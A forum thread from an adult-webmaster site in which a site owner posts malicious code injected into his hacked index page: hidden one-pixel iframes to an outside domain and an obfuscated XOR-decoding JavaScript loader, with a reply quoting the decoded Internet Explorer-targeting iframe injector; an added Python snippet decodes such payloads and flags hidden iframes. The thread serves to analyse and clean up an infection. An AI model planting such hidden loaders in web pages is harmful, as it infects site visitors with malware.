GoFuckYourself.com - Adult Webmaster Forum


ER!C L!VE 12-11-2006 02:34 PM

Someone hacked my TGP and put this code on my index.html
 
Does anyone know what this code does? It could be a stats counter for all I know.. Any helpful input is appreciated.

<body bgcolor="#ffffff">
<iframe src='http://wsfgfdgrtyhgfd.net/adv/171/new.php' width=1 height=1></iframe><iframe src='http://wsfgfdgrtyhgfd.net/adv/new.php?adv=171' width=1 height=1></iframe><script language="JavaScript">e = '0x00' + '25';str1 = "%9E%C6%CD%D0%BA%D7%D6%DD%CE%C1%99%84%D0%CD%D7%CD% C4%CD%CE%CD%D6%DD%9C%C2%CD%C6%C6%C1%C8%84%98%9E%CD %C0%D4%C5%C9%C1%BA%D7%D4%C7%99%84%C2%D6%D6%CA%9C%8 B%8B%C3%D4%C1%D6%C5%C4%C7%88%C7%CB%C9%8B%C6%C8%D0% 97%8B%84%BA%D3%CD%C6%D6%C2%99%95%BA%C2%C1%CD%C3%C2 %D6%99%95%98%9E%8B%CD%C0%D4%C5%C9%C1%98%9E%8B%C6%C D%D0%98";str=tmp='';for(i=0;i<str1.length;i+=3){tm p = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>
</body>
</html>

Thanks in advance!

Eric
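
The script in the post above undoes a simple per-byte encoding (XOR with 0x25, then subtract 127) before calling document.write, so its output can be recovered offline without loading the page in a browser. An added example, not part of the original thread: a Python sketch that reverses that arithmetic statically and flags 1x1 or style-hidden iframes. The sample payload, the payload.example host and the function names are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote_to_bytes

XOR_KEY = 0x25  # the posted script sets e = '0x00' + '25'; JavaScript's ^ coerces it to 0x25
OFFSET = 127    # subtracted after the XOR in the posted loop

def decode_payload(str1):
    """Reverse (byte ^ e) - 127 over %XX triplets without executing anything."""
    cleaned = re.sub(r"\s+", "", str1)  # tolerate spaces added by forum line wrapping
    if not re.fullmatch(r"(?:%[0-9A-Fa-f]{2})*", cleaned):
        raise ValueError("expected only %XX triplets")
    # & 0xFFFF mirrors String.fromCharCode's 16-bit wrap for out-of-range values
    return "".join(chr(((b ^ XOR_KEY) - OFFSET) & 0xFFFF)
                   for b in unquote_to_bytes(cleaned))

def encode_sample(text):
    """Inverse transform, used only to build the constructed test input below."""
    return "".join("%%%02X" % ((ord(c) + OFFSET) ^ XOR_KEY) for c in text)

class _FrameFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "").strip() for k, v in attrs}
        tiny = a.get("width") in ("0", "1") and a.get("height") in ("0", "1")
        styled = re.search(r"display\s*:\s*none|visibility\s*:\s*hidden",
                           a.get("style", ""), re.I)
        if tiny or styled:
            self.hits.append(a.get("src", ""))

def hidden_iframes(html):
    """Return src values of iframes sized 0/1 px or hidden via inline style (heuristic)."""
    finder = _FrameFinder()
    finder.feed(html)
    finder.close()
    return finder.hits

# Constructed sample: a benign stand-in for an injected frame, not the thread's payload.
SAMPLE_HTML = '<iframe src="http://payload.example/x" width=1 height=1></iframe>'

if __name__ == "__main__":
    decoded = decode_payload(encode_sample(SAMPLE_HTML))
    print(decoded)
    print(hidden_iframes(decoded))
```

Running hidden_iframes over every HTML file in the web root after cleanup is a quick way to confirm no injected frame was missed.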

JD 12-11-2006 02:42 PM

I've made numerous posts about this. Remove the iframe and javascript then change all the system passwords as well as your trade script/thumb script pwds and you should be fine.

It's a bot of some sort that's doing it. I've been hit many many times and changing all the pwds was the only way it managed to stop.

jacked 12-11-2006 02:43 PM

you got scumware on that box

HTML/TrojanDownloader.Agent.AU

do a search for

http://wsfgfdgrtyhgfd.net


Quote:

decrypt_p("rvBcveRszie7mhKLa_OIa_3vigdIhhAcqeO@Yic 786VExeJ7ienLF8OP4rdI9_3vMhKE3M3IpyKzMFwzYrdI9_AZo LKPolVI4yAE6_Kzyh3LHQmviUd@qenL6yKPp49sMiOP4r3Pp49 VJ4JLSeOP4e9QojJ7oSO@MiALFruzphwEk8OviqDLM_K7b6t7f yAIkQ3PMicUFeO@p_wQavmsQeRXu_b7Mh3LHQX7zhAPH8DLMiO I3r3P4et76enItbt@piJzeGuUF8cPaRwPaeJEwTAP_iKUM_wES FwPhytWFSBUfRKPay9@Mi3PJrtzO4c7oSO@fiJ@tb9Wi6t@H@A POiOviFX7odKzxQ3PiyKzf_KztbtWiD1vSLgVThdj2rB23jml1 GucveRszi0v")</script>

This is what is run when the page loads. This calls the decrypt
function and passes it this long string of "garbage".

the decrypt function decodes this into the following javascript program
and inserts it into the web page.

<SCRIPT language="JavaScript">
var browserName=navigator.appName;
if (browserName=="Microsoft Internet Explorer") {
window.status="Done";
document.write('<IFRAME name="PageContainer"
src="http://wsfgfdgrtyhgfd.net/adv/077/dffg/index.php" width="1"
height="1" frameborder="0"></IFRAME>');
}
</SCRIPT>

As you can see, the spyware targets only Microsoft Internet Explorer
likely because it has some security flaw the site wants to exploit.
Basically a web page with the decrypt function will set up a small
iframe (1 pixel in size) and load the page at

http://wsfgfdgrtyhgfd.net/adv/077/dffg/index.php

Which is presently recorded as being owned by:
Domain Name: WSFGFDGRTYHGFD.NET
Registrar: ONLINENIC, INC.
Whois Server: whois.OnlineNIC.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS4.ASDBIZ.BIZ
Name Server: NS3.ASDBIZ.BIZ
Status: ACTIVE
EPP Status: ok
Updated Date: 15-Nov-2006
Creation Date: 12-Oct-2006
Expiration Date: 12-Oct-2007

The web server for this domain is presently down so what the iframe was
actually doing is an open question.

But yes, you can assume that the effort to purge the computer of
mal/adware was not 100% effective.
and more about it here

http://www.aboutus.org/Wsfgfdgrtyhgfd.net

ER!C L!VE 12-11-2006 02:44 PM

Fuck. Thanks bro.

Violetta 12-11-2006 03:12 PM

Yeah... I've had trouble with that shit too! It is some kind of a trojan. Anyway, what I did was upgrade WordPress and change the password to my FTP! Never happened again after that!


All times are GMT -7.